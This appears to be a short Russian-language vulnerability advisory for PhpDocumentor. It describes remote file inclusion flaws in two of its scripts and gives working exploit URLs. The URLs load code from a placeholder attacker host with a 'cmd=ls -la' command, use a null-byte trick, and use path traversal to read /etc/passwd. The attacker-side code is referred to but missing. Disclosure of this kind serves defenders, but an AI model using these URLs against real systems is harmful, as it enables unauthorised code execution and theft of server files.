Описание:
PhpDocumentor, или по другому phpdoc. Является стандартным инструментом
для php языка. Может быть использован для создания профессиональной
документации от php исходного текста.
Уязвимость:
1) Уязвимый код в Documentation/tests/bug-559668.php линия 4:
....
require_once $FORUM['LIB'] . '/classes/db/PearDb.php';
....
Пример:
http://[target]/[path_to_phpdocumentor]/Documentation/tests/bug-559668.php?cmd=ls%20-la&FORUM[LIB]=http://[attacker]
где в http://[attacker]/classes/db/PearDb.php/index.html
вы должны вставить код:
Либо:
http://[target]/[path_to_phpdocumentor]/Documentation/tests/bug-559668.php?FORUM[LIB]=http://[attacker]/script.txt%00
http://[target]/[path_to_phpdocumentor]/Documentation/tests/bug-559668.php?FORUM[LIB]=../../../../../../../etc/passwd%00
2) Уязвимсоть в docbuilder/file_dialog.php линии 49-56:
Пример:
http://[target]/[path_to_phpdocumentor]/docbuilder/file_dialog.php?cmd=ls%20-la&root_dir=http://[attacker]
где в http://[attacker]/phpDocumentor/common.inc.php/index.html
необходимо подставить некоторый код.